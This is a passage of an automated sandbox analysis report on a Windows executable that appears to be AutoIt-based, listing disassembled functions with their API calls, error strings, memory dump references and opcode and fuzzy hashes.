                                                                                                                                                                        • Opcode Fuzzy Hash: 91ac2fb709183e5a1639e2625a78f9221d8311fbda42da16858d29b32eb15915
                                                                                                                                                                        • Instruction Fuzzy Hash: F5110A3527D357BBE7056F18EC82EBA7BDC9F05761B24017EF908A62C1E7F05A104660
                                                                                                                                                                        Function 002CE73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                                                        • API String ID: 642191829-3771769585
                                                                                                                                                                        • Opcode ID: 701db7a1a33c37bfd794ef3e231185ede77ef9a7f1663f48e3ee509e3e4a011e
                                                                                                                                                                        • Instruction ID: 98406e2c7901e34bf1ebcaa55227d7ff71f5e8e87f0e072bf3385106bc60309d
                                                                                                                                                                        • Opcode Fuzzy Hash: 701db7a1a33c37bfd794ef3e231185ede77ef9a7f1663f48e3ee509e3e4a011e
                                                                                                                                                                        • Instruction Fuzzy Hash: 5F11E7355211157BCF207B20EC4AFEEB76CDF01760F01027AF505A60D1EEB48A95DB50
                                                                                                                                                                        Function 002CF630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcslen$LocalTime
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 952045576-0
                                                                                                                                                                        • Opcode ID: 7f1aa57701a535da78eb5bd810d3e73d3e3dabc829a8e7b869096a061c09c6d2
                                                                                                                                                                        • Instruction ID: 7e15f33a981e885d4eea212d0e29be5053c38f40bce6bb5860b13a0665d5491b
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f1aa57701a535da78eb5bd810d3e73d3e3dabc829a8e7b869096a061c09c6d2
                                                                                                                                                                        • Instruction Fuzzy Hash: BB41A469C2221965DB11FBB48C8AFCFB37DAF05310F008526E508E31A1FA34E275C7A6
                                                                                                                                                                        Function 002F379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 002F37B7
                                                                                                                                                                        • GetDC.USER32(00000000), ref: 002F37BF
                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002F37CA
                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 002F37D6
                                                                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002F3812
                                                                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002F3823
                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,002F6504,?,?,000000FF,00000000,?,000000FF,?), ref: 002F385E
                                                                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002F387D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3864802216-0
                                                                                                                                                                        • Opcode ID: 883833ede937179d985b1dce38a469e4c7b4d491ac191c430ad82ce155a82e0c
                                                                                                                                                                        • Instruction ID: ac0e3a7981f2154b8191e2ce0692a7142001632849ba8a9028a778e2880cb8a2
                                                                                                                                                                        • Opcode Fuzzy Hash: 883833ede937179d985b1dce38a469e4c7b4d491ac191c430ad82ce155a82e0c
                                                                                                                                                                        • Instruction Fuzzy Hash: 0231B171110214BFEB118F50DC49FFB7BAEEF097A1F040025FE089A191C6B59C51CBA0
                                                                                                                                                                        Function 002E5A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                        • API String ID: 0-572801152
                                                                                                                                                                        • Opcode ID: 54524b9ed97290208ed0188e9d2565dec7fa5e57811f1e80245252a4a24fe4cd
                                                                                                                                                                        • Instruction ID: d7358529cbe3d38114b37c8de8a7f691196a055e32bf9a3db9a697e4114e2eb4
                                                                                                                                                                        • Opcode Fuzzy Hash: 54524b9ed97290208ed0188e9d2565dec7fa5e57811f1e80245252a4a24fe4cd
                                                                                                                                                                        • Instruction Fuzzy Hash: 7ED10171A6065A9FDF10CF69C884BAEB7B5FF48308F548169E905AB280E770DD51CB60
                                                                                                                                                                        Function 002A18A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,002A1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 002A194E
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002A1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002A19D1
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,002A1B7B,?,002A1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002A1A64
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002A1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002A1A7B
                                                                                                                                                                          • Part of subcall function 00293B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00286A79,?,0000015D,?,?,?,?,002885B0,000000FF,00000000,?,?), ref: 00293BC5
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,002A1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002A1AF7
                                                                                                                                                                        • __freea.LIBCMT ref: 002A1B22
                                                                                                                                                                        • __freea.LIBCMT ref: 002A1B2E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2829977744-0
                                                                                                                                                                        • Opcode ID: 8477eff95c5bfce938dde0b67f1b877a01eea47f846c329ff87c981a492c8cbb
                                                                                                                                                                        • Instruction ID: e2bcf290ffa1e48798c0572c7f099f8644fb2058732f42e82cb03ff96cc4fdad
                                                                                                                                                                        • Opcode Fuzzy Hash: 8477eff95c5bfce938dde0b67f1b877a01eea47f846c329ff87c981a492c8cbb
                                                                                                                                                                        • Instruction Fuzzy Hash: D791A371E202179BDF248E64C891AEEBBA5AF0A324F180569E805E7181EF35DD74CB60
                                                                                                                                                                        Function 002E4F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Variant$ClearInit
                                                                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                        • API String ID: 2610073882-625585964
                                                                                                                                                                        • Opcode ID: fc74128cb5c4ba0f758e37df7472cc5df85e8ca85aa733ba1137f11c857b6c20
                                                                                                                                                                        • Instruction ID: b6cfd7138bd340cd7ef83dad2ea6993be7fedc4918320c6f510756790a16f925
                                                                                                                                                                        • Opcode Fuzzy Hash: fc74128cb5c4ba0f758e37df7472cc5df85e8ca85aa733ba1137f11c857b6c20
                                                                                                                                                                        • Instruction Fuzzy Hash: 2091C470A60665AFDF20CFA6DC44FAEBBB8EF45718F108519F509AB280D7709951CFA0
                                                                                                                                                                        Function 002D1B46 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 002D1C1B
                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002D1C43
                                                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 002D1C67
                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002D1C97
                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002D1D1E
                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002D1D83
                                                                                                                                                                        • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 002D1DEF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2550207440-0
                                                                                                                                                                        • Opcode ID: dec737842a5f71724a4d18648d338f8832203518f0b4a850d95304fc35b45d34
                                                                                                                                                                        • Instruction ID: 79c28cfe60f45b7af98101299f784da70332633d764e28bf1e32c85481068700
                                                                                                                                                                        • Opcode Fuzzy Hash: dec737842a5f71724a4d18648d338f8832203518f0b4a850d95304fc35b45d34
                                                                                                                                                                        • Instruction Fuzzy Hash: D391DF75A20219AFDB009F94C885BBEB7B5FF04725F104027E940AB7A1D774AD60CF91
                                                                                                                                                                        Function 002E43A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 002E43C8
                                                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 002E44D7
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002E44E7
                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 002E467C
                                                                                                                                                                          • Part of subcall function 002D169E: VariantInit.OLEAUT32(00000000), ref: 002D16DE
                                                                                                                                                                          • Part of subcall function 002D169E: VariantCopy.OLEAUT32(?,?), ref: 002D16E7
                                                                                                                                                                          • Part of subcall function 002D169E: VariantClear.OLEAUT32(?), ref: 002D16F3
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                        • API String ID: 4137639002-1221869570
                                                                                                                                                                        • Opcode ID: 9f72d5508ab7d37ff6b067623d6e789bd6c53490567c5877eb7a195df305e3a4
                                                                                                                                                                        • Instruction ID: d0c99e911b2073af76637b67490b932127d92daabdf5f8fdc8efa3ccde58a78b
                                                                                                                                                                        • Opcode Fuzzy Hash: 9f72d5508ab7d37ff6b067623d6e789bd6c53490567c5877eb7a195df305e3a4
                                                                                                                                                                        • Instruction Fuzzy Hash: 1C9156746283429FC700EF25C48496AB7E5BF89314F54892DF8898B351DB31ED55CF82
                                                                                                                                                                        Function 002E560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 002C08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?,?,?,002C0C4E), ref: 002C091B
                                                                                                                                                                          • Part of subcall function 002C08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?,?), ref: 002C0936
                                                                                                                                                                          • Part of subcall function 002C08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?,?), ref: 002C0944
                                                                                                                                                                          • Part of subcall function 002C08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002C0831,80070057,?), ref: 002C0954
                                                                                                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 002E56AE
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002E57B6
                                                                                                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 002E582C
                                                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 002E5837
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                        • String ID: NULL Pointer assignment
                                                                                                                                                                        • API String ID: 614568839-2785691316
                                                                                                                                                                        • Opcode ID: b702f7ea319765aef7411e3a9f09d8ea627892e180e7840e5a914bd7a5f28863
                                                                                                                                                                        • Instruction ID: 84e9fbe89f1dfa984a5ba142de4f30de29d505a2f5e60a55b500a058ad7af448
                                                                                                                                                                        • Opcode Fuzzy Hash: b702f7ea319765aef7411e3a9f09d8ea627892e180e7840e5a914bd7a5f28863
                                                                                                                                                                        • Instruction Fuzzy Hash: A0913971D20269EFDF11DFA4D880EEDB7B9BF08304F504169E915A7251EB709AA4CF60
                                                                                                                                                                        Function 002F2B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetMenu.USER32(?), ref: 002F2C1F
                                                                                                                                                                        • GetMenuItemCount.USER32(00000000), ref: 002F2C51
                                                                                                                                                                        • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002F2C79
                                                                                                                                                                        • _wcslen.LIBCMT ref: 002F2CAF
                                                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 002F2CE9
                                                                                                                                                                        • GetSubMenu.USER32(?,?), ref: 002F2CF7
                                                                                                                                                                          • Part of subcall function 002C4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002C43AD
                                                                                                                                                                          • Part of subcall function 002C4393: GetCurrentThreadId.KERNEL32 ref: 002C43B4
                                                                                                                                                                          • Part of subcall function 002C4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002C2F00), ref: 002C43BB
                                                                                                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002F2D7F
                                                                                                                                                                          • Part of subcall function 002CF292: Sleep.KERNEL32 ref: 002CF30A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4196846111-0
                                                                                                                                                                        • Opcode ID: 110f5b186ea4a57f0b48c00a275e620d4bb9e4d1836adb5c84f4d8096a267d72
                                                                                                                                                                        • Instruction ID: 7cf8c49455fc49d0beba302b9c62bcb8ba122682134dedc07317ca7215a0ff4b
                                                                                                                                                                        • Opcode Fuzzy Hash: 110f5b186ea4a57f0b48c00a275e620d4bb9e4d1836adb5c84f4d8096a267d72
                                                                                                                                                                        • Instruction Fuzzy Hash: 5871BE75A10209EFCB00EF64C885ABEBBB5EF49360F118469E916EB351DB34AD51CF90
                                                                                                                                                                        Function 002CB881 Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetParent.USER32(?), ref: 002CB8C0
                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 002CB8D5
                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 002CB936
                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 002CB964
                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 002CB983
                                                                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 002CB9C4
                                                                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002CB9E7
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                                        • Opcode ID: 4e35e66ce2c980ce2ef74d65885ef461a6a01660a1ba80d5b91295a67ec9413e
                                                                                                                                                                        • Instruction ID: 59f6fb5e92c02e122d74709acd3f3a13a2900391f75a36c811bb52d809abe017
                                                                                                                                                                        • Opcode Fuzzy Hash: 4e35e66ce2c980ce2ef74d65885ef461a6a01660a1ba80d5b91295a67ec9413e
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F51F4A05647D63DFB374A348C46FB6BEA95F06304F08868DE1D5458D2C3E8ACE4DB50
                                                                                                                                                                        Function 002CB6A1 Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetParent.USER32(00000000), ref: 002CB6E0
                                                                                                                                                                        • GetKeyboardState.USER32(?), ref: 002CB6F5
                                                                                                                                                                        • SetKeyboardState.USER32(?), ref: 002CB756
                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002CB782
                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002CB79F
                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002CB7DE
                                                                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002CB7FF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000B.00000002.2323498910.0000000000261000.00000020.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                        • Associated: 0000000B.00000002.2323477904.0000000000260000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.00000000002FD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323550678.0000000000323000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323595052.000000000032D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000B.00000002.2323612847.0000000000335000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_11_2_260000_Hc.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                                                        • Opcode ID: f26d58cfbe81c94cba81a7c61860cbfc0f6312a5387982895366e3f5a0728c54
                                                                                                                                                                        • Instruction ID: 2058e08db0a596daed79453924957bc47b5561e9a9dc6dba0ae1c87de2aedbf1
                                                                                                                                                                        • Opcode Fuzzy Hash: f26d58cfbe81c94cba81a7c61860cbfc0f6312a5387982895366e3f5a0728c54
                                                                                                                                                                        • Instruction Fuzzy Hash: AC5124A19287D63DFB338B34CC56F76BE995B01304F08868DE5D95A8C2D394ECA8DB50
                                                                                                                                                                        Function 002957A1 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
